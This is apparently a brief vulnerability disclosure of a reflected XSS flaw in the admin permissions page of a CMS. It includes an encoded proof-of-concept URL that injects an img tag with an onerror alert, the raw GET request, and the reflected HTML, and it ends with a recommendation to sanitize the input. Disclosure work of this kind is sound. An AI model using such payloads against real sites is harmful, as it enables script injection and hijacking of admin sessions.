/admin/controllers/edit/activity/perms/
takes input from the URL directly without sufficient sanitization leading to a Reflected XSS.
A valid admin session is required, without it, the user will be brought to the login page instead of the affected page.
http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E
"><img src>
Request:
GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]
The inserted input would then be reflected on the page like this:
<form action="/admin/controllers/edit/activity/perms_save/"><img src>" method="post">
It is recommended to sanitize the input before it is reflected on the affected page.